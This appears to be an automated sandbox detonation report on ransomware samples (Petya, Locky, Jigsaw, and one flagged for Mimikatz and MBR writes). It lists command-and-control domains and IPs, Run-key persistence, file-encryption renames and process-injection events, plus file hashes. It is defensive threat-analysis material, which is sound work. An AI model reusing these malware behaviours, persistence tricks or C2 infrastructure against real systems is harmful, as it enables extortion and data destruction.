"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petya\Ransomware.Petya\26b4699a7b9eeb16e76305d843d4ab05e94d43f3201436927e13b3ebafa90739.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.32.126.40.in-addr.arpa | udp |
Files
memory/4308-0-0x000000000041A000-0x0000000000427000-memory.dmp
memory/4308-1-0x0000000000400000-0x000000000043F000-memory.dmp
Analysis: behavioral31
Detonation Overview
Submitted
2024-06-30 00:59
Reported
2024-06-30 01:30
Platform
win7-20240508-en
Max time kernel
1561s
Max time network
1562s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\out.exe |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2984 wrote to memory of 1452 | N/A | C:\Users\Admin\AppData\Local\Temp\out.exe | C:\Windows\SysWOW64\WerFault.exe |
| PID 2984 wrote to memory of 1452 | N/A | C:\Users\Admin\AppData\Local\Temp\out.exe | C:\Windows\SysWOW64\WerFault.exe |
| PID 2984 wrote to memory of 1452 | N/A | C:\Users\Admin\AppData\Local\Temp\out.exe | C:\Windows\SysWOW64\WerFault.exe |
| PID 2984 wrote to memory of 1452 | N/A | C:\Users\Admin\AppData\Local\Temp\out.exe | C:\Windows\SysWOW64\WerFault.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\out.exe
"C:\Users\Admin\AppData\Local\Temp\out.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2984 -s 36
Network
Files
Analysis: behavioral7
Detonation Overview
Submitted
2024-06-30 00:59
Reported
2024-06-30 01:30
Platform
win7-20240611-en
Max time kernel
1790s
Max time network
1790s
Command Line
Signatures
Locky
Processes
C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Locky\Locky.exe
"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Locky\Locky.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | nwohmkgabcexy.uk | udp |
| US | 8.8.8.8:53 | bmltj.yt | udp |
| US | 8.8.8.8:53 | oclkiawk.pm | udp |
| US | 8.8.8.8:53 | greootc.eu | udp |
| US | 162.249.64.234:80 | greootc.eu | tcp |
| US | 8.8.8.8:53 | tektkyupmj.be | udp |
| US | 8.8.8.8:53 | htknqmpojpkrl.yt | udp |
| IE | 86.104.134.144:80 | tcp | |
| US | 162.249.64.234:80 | greootc.eu | tcp |
| IE | 86.104.134.144:80 | tcp | |
| US | 162.249.64.234:80 | greootc.eu | tcp |
| IE | 86.104.134.144:80 | tcp | |
| US | 162.249.64.234:80 | greootc.eu | tcp |
| IE | 86.104.134.144:80 | tcp | |
| US | 162.249.64.234:80 | greootc.eu | tcp |
| IE | 86.104.134.144:80 | tcp | |
| US | 162.249.64.234:80 | greootc.eu | tcp |
| IE | 86.104.134.144:80 | tcp | |
| US | 162.249.64.234:80 | greootc.eu | tcp |
| IE | 86.104.134.144:80 | tcp | |
| US | 162.249.64.234:80 | greootc.eu | tcp |
| IE | 86.104.134.144:80 | tcp | |
| US | 162.249.64.234:80 | greootc.eu | tcp |
| IE | 86.104.134.144:80 | tcp | |
| US | 162.249.64.234:80 | greootc.eu | tcp |
| IE | 86.104.134.144:80 | tcp | |
| US | 162.249.64.234:80 | greootc.eu | tcp |
| IE | 86.104.134.144:80 | tcp | |
| US | 162.249.64.234:80 | greootc.eu | tcp |
| IE | 86.104.134.144:80 | tcp | |
| US | 162.249.64.234:80 | greootc.eu | tcp |
| IE | 86.104.134.144:80 | tcp | |
| US | 162.249.64.234:80 | greootc.eu | tcp |
| IE | 86.104.134.144:80 | tcp | |
| US | 162.249.64.234:80 | greootc.eu | tcp |
| IE | 86.104.134.144:80 | tcp | |
| US | 162.249.64.234:80 | greootc.eu | tcp |
| IE | 86.104.134.144:80 | tcp | |
| US | 162.249.64.234:80 | greootc.eu | tcp |
| IE | 86.104.134.144:80 | tcp | |
| US | 162.249.64.234:80 | greootc.eu | tcp |
| IE | 86.104.134.144:80 | tcp | |
| US | 162.249.64.234:80 | greootc.eu | tcp |
| IE | 86.104.134.144:80 | tcp | |
| US | 162.249.64.234:80 | greootc.eu | tcp |
| IE | 86.104.134.144:80 | tcp | |
| US | 162.249.64.234:80 | greootc.eu | tcp |
| IE | 86.104.134.144:80 | tcp | |
| US | 162.249.64.234:80 | greootc.eu | tcp |
| IE | 86.104.134.144:80 | tcp | |
| US | 8.8.8.8:53 | nwohmkgabcexy.uk | udp |
| US | 8.8.8.8:53 | bmltj.yt | udp |
| US | 8.8.8.8:53 | oclkiawk.pm | udp |
| US | 162.249.64.234:80 | greootc.eu | tcp |
| US | 8.8.8.8:53 | tektkyupmj.be | udp |
| US | 8.8.8.8:53 | htknqmpojpkrl.yt | udp |
| IE | 86.104.134.144:80 | tcp | |
| US | 162.249.64.234:80 | greootc.eu | tcp |
| IE | 86.104.134.144:80 | tcp | |
| US | 162.249.64.234:80 | greootc.eu | tcp |
| IE | 86.104.134.144:80 | tcp | |
| US | 162.249.64.234:80 | greootc.eu | tcp |
| IE | 86.104.134.144:80 | tcp | |
| US | 162.249.64.234:80 | greootc.eu | tcp |
| IE | 86.104.134.144:80 | tcp | |
| US | 162.249.64.234:80 | greootc.eu | tcp |
| IE | 86.104.134.144:80 | tcp | |
| US | 162.249.64.234:80 | greootc.eu | tcp |
| IE | 86.104.134.144:80 | tcp | |
| US | 162.249.64.234:80 | greootc.eu | tcp |
| IE | 86.104.134.144:80 | tcp | |
| US | 162.249.64.234:80 | greootc.eu | tcp |
| IE | 86.104.134.144:80 | tcp | |
| US | 162.249.64.234:80 | greootc.eu | tcp |
| IE | 86.104.134.144:80 | tcp | |
| US | 162.249.64.234:80 | greootc.eu | tcp |
| IE | 86.104.134.144:80 | tcp | |
| US | 162.249.64.234:80 | greootc.eu | tcp |
| IE | 86.104.134.144:80 | tcp | |
| US | 162.249.64.234:80 | greootc.eu | tcp |
| IE | 86.104.134.144:80 | tcp | |
| US | 162.249.64.234:80 | greootc.eu | tcp |
| IE | 86.104.134.144:80 | tcp | |
| US | 162.249.64.234:80 | greootc.eu | tcp |
| IE | 86.104.134.144:80 | tcp | |
| US | 162.249.64.234:80 | greootc.eu | tcp |
| IE | 86.104.134.144:80 | tcp | |
| US | 162.249.64.234:80 | greootc.eu | tcp |
| IE | 86.104.134.144:80 | tcp | |
| US | 162.249.64.234:80 | greootc.eu | tcp |
| IE | 86.104.134.144:80 | tcp | |
| US | 162.249.64.234:80 | greootc.eu | tcp |
| IE | 86.104.134.144:80 | tcp | |
| US | 162.249.64.234:80 | greootc.eu | tcp |
| IE | 86.104.134.144:80 | tcp | |
| US | 162.249.64.234:80 | greootc.eu | tcp |
Files
memory/2228-0-0x0000000000220000-0x0000000000224000-memory.dmp
memory/2228-1-0x0000000000400000-0x00000000007D1000-memory.dmp
memory/2228-3-0x0000000000400000-0x00000000007D1000-memory.dmp
memory/2228-7-0x0000000000400000-0x00000000007D1000-memory.dmp
memory/2228-9-0x0000000000400000-0x00000000007D1000-memory.dmp
memory/2228-12-0x0000000000400000-0x00000000007D1000-memory.dmp
memory/2228-13-0x0000000000400000-0x00000000007D1000-memory.dmp
memory/2228-15-0x0000000000400000-0x00000000007D1000-memory.dmp
memory/2228-16-0x0000000000400000-0x00000000007D1000-memory.dmp
memory/2228-18-0x0000000000400000-0x00000000007D1000-memory.dmp
memory/2228-20-0x0000000000400000-0x00000000007D1000-memory.dmp
memory/2228-21-0x0000000000400000-0x00000000007D1000-memory.dmp
memory/2228-23-0x0000000000400000-0x00000000007D1000-memory.dmp
memory/2228-24-0x0000000000400000-0x00000000007D1000-memory.dmp
memory/2228-26-0x0000000000400000-0x00000000007D1000-memory.dmp
memory/2228-28-0x0000000000400000-0x00000000007D1000-memory.dmp
memory/2228-29-0x0000000000400000-0x00000000007D1000-memory.dmp
memory/2228-31-0x0000000000400000-0x00000000007D1000-memory.dmp
memory/2228-33-0x0000000000400000-0x00000000007D1000-memory.dmp
memory/2228-34-0x0000000000400000-0x00000000007D1000-memory.dmp
memory/2228-36-0x0000000000400000-0x00000000007D1000-memory.dmp
memory/2228-37-0x0000000000400000-0x00000000007D1000-memory.dmp
memory/2228-40-0x0000000000400000-0x00000000007D1000-memory.dmp
memory/2228-41-0x0000000000400000-0x00000000007D1000-memory.dmp
memory/2228-45-0x0000000000400000-0x00000000007D1000-memory.dmp
memory/2228-46-0x0000000000400000-0x00000000007D1000-memory.dmp
memory/2228-48-0x0000000000400000-0x00000000007D1000-memory.dmp
memory/2228-50-0x0000000000400000-0x00000000007D1000-memory.dmp
memory/2228-52-0x0000000000400000-0x00000000007D1000-memory.dmp
memory/2228-53-0x0000000000400000-0x00000000007D1000-memory.dmp
memory/2228-55-0x0000000000400000-0x00000000007D1000-memory.dmp
memory/2228-57-0x0000000000400000-0x00000000007D1000-memory.dmp
memory/2228-58-0x0000000000400000-0x00000000007D1000-memory.dmp
memory/2228-60-0x0000000000400000-0x00000000007D1000-memory.dmp
memory/2228-62-0x0000000000400000-0x00000000007D1000-memory.dmp
memory/2228-63-0x0000000000400000-0x00000000007D1000-memory.dmp
memory/2228-64-0x0000000000400000-0x00000000007D1000-memory.dmp
memory/2228-65-0x0000000000400000-0x00000000007D1000-memory.dmp
Analysis: behavioral5
Detonation Overview
Submitted
2024-06-30 00:59
Reported
2024-06-30 01:30
Platform
win7-20240508-en
Max time kernel
1800s
Max time network
1564s
Command Line
Signatures
Jigsaw Ransomware
Renames multiple (2015) files with added filename extension
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Jigsaw\jigsaw.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\babypink.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\7.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\it-IT\gadget.xml | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\DataViewIconImages.jpg | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_left_disabled.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\rtf_italic.gif | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File created | C:\Program Files\7-Zip\Lang\ast.txt.fun | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Newsprint.xml | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\asl-v20.txt.fun | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\NavigationRight_SelectionSubpicture.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64.nl_ja_4.4.0.v20140623020002.jar.fun | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\locale\com-sun-tools-visualvm-modules-startup_ja.jar.fun | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\javafx-mx.jar | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\nav_leftarrow.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-text.xml.fun | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\bg_Groove.gif.fun | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring-fallback_ja.jar.fun | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-masterfs_zh_CN.jar.fun | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Heart_SelectionSubpicture.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core.jar.fun | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\Office14\Groove\XML Files\Messenger.xml.fun | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\17.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\rtf_hyperlink.gif | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-profiling.xml.fun | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_box_right.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\19.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File created | C:\Program Files\Java\jre7\lib\images\cursors\invalid32x32.gif.fun | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\AssemblyInfoInternal.zip | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.model.workbench_1.1.0.v20140512-1820.jar | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.swt_3.103.1.v20140903-1938.jar | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.net.nl_ja_4.4.0.v20140623020002.jar | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ql.nl_ja_4.4.0.v20140623020002.jar | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.nl_zh_4.4.0.v20140623020002.jar | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\Adobe\Help\en_US\Adobe Reader\9.0\helpmap.txt | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsViewAttachmentIconsMask.bmp | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-util-enumerations.xml | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Templates\1033\ApothecaryNewsletter.dotx | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_left_pressed.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\de-DE\js\currency.js | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\smtp.jar.fun | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\EmptyDatabase.zip | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\tg.txt | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\jre\lib\jce.jar.fun | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\hint_down.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_gray_thunderstorm.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-spi-quicksearch.jar | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler_ja.jar | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Thatch.xml | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\vintage.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\flower_dot.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\bg-dock.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_left_rest.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.text_3.5.300.v20130515-1451.jar.fun | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.sat4j.pb_2.3.5.v201404071733.jar | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\ipschs.xml | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_zh_CN.jar.fun | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-ui_ja.jar.fun | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\help.gif.fun | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\Templates\1033\Training.potx.fun | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\greenStateIcon.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\en-US\gadget.xml | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\8.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-swing-plaf.xml.fun | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-text_ja.jar | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2604 wrote to memory of 1860 | N/A | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Jigsaw\jigsaw.exe | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe |
| PID 2604 wrote to memory of 1860 | N/A | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Jigsaw\jigsaw.exe | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe |
| PID 2604 wrote to memory of 1860 | N/A | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Jigsaw\jigsaw.exe | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Jigsaw\jigsaw.exe
"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Jigsaw\jigsaw.exe"
C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe
"C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe" C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Jigsaw\jigsaw.exe
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Windows\system32\Dwm.exe
"C:\Windows\system32\Dwm.exe"
Network
Files
memory/2604-0-0x000007FEF535E000-0x000007FEF535F000-memory.dmp
memory/2604-1-0x0000000000460000-0x0000000000498000-memory.dmp
memory/2604-2-0x000007FEF50A0000-0x000007FEF5A3D000-memory.dmp
memory/2604-6-0x000007FEF50A0000-0x000007FEF5A3D000-memory.dmp
C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe
| MD5 | 2773e3dc59472296cb0024ba7715a64e |
| SHA1 | 27d99fbca067f478bb91cdbcb92f13a828b00859 |
| SHA256 | 3ae96f73d805e1d3995253db4d910300d8442ea603737a1428b613061e7f61e7 |
| SHA512 | 6ef530b209f8ec459cca66dbf2c31ec96c5f7d609f17fa3b877d276968032fbc6132ea4a45ed1450fb6c5d730a7c9349bf4481e28befaea6b119ec0ded842262 |
memory/1860-11-0x000007FEF50A0000-0x000007FEF5A3D000-memory.dmp
memory/2604-10-0x000007FEF50A0000-0x000007FEF5A3D000-memory.dmp
memory/1860-12-0x000007FEF50A0000-0x000007FEF5A3D000-memory.dmp
memory/1860-13-0x000007FEF50A0000-0x000007FEF5A3D000-memory.dmp
memory/1860-248-0x000007FEF50A0000-0x000007FEF5A3D000-memory.dmp
C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\invalid32x32.gif.fun
| MD5 | 580ee0344b7da2786da6a433a1e84893 |
| SHA1 | 60f8c4dd5457e9834f5402cb326b1a2d3ca0ba7e |
| SHA256 | 98b6c2ddfefc628d03ceaef9d69688674a6bc32eb707f9ed86bc8c75675c4513 |
| SHA512 | 356d2cdea3321e894b5b46ad1ea24c0e3c8be8e3c454b5bd300b7340cbb454e71fc89ca09ea0785b373b483e67c2f6f6bb408e489b0de4ff82d5ed69a75613ba |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\container.dat.fun
| MD5 | 8ebcc5ca5ac09a09376801ecdd6f3792 |
| SHA1 | 81187142b138e0245d5d0bc511f7c46c30df3e14 |
| SHA256 | 619e246fc0ac11320ff9e322a979948d949494b0c18217f4d794e1b398818880 |
| SHA512 | cec50bfc6ad2f57f16da99459f40f2d424c6d5691685fa1053284f46c8c8c8a975d7bcb1f3521c4f3fbdc310cf4714e29404aa23be6021e2e267c97b090dc650 |
memory/1860-2037-0x000007FEF50A0000-0x000007FEF5A3D000-memory.dmp
memory/1860-2040-0x000007FEF50A0000-0x000007FEF5A3D000-memory.dmp
memory/2924-2041-0x0000000140000000-0x00000001405E8000-memory.dmp
memory/2924-2042-0x0000000140000000-0x00000001405E8000-memory.dmp
memory/2924-2043-0x0000000140000000-0x00000001405E8000-memory.dmp
memory/2924-2044-0x0000000140000000-0x00000001405E8000-memory.dmp
memory/1860-2045-0x000007FEF50A0000-0x000007FEF5A3D000-memory.dmp
Analysis: behavioral13
Detonation Overview
Submitted
2024-06-30 00:59
Reported
2024-06-30 01:30
Platform
win7-20240419-en
Max time kernel
1799s
Max time network
1800s
Command Line
Signatures
Mimikatz
mimikatz is an open source tool to dump credentials on Windows
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\202E.tmp | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Reads user/profile data of web browsers
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Windows\SysWOW64\rundll32.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\REC.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\SAMPLES\SOLVSAMP.XLS | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Visualizer.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\CompareHide.doc | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgeCalls.h | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\amd64\jvm.cfg | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLN.DOC | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\MDIParent.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\RequestMount.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLV.XLS | C:\Windows\SysWOW64\rundll32.exe | N/A |
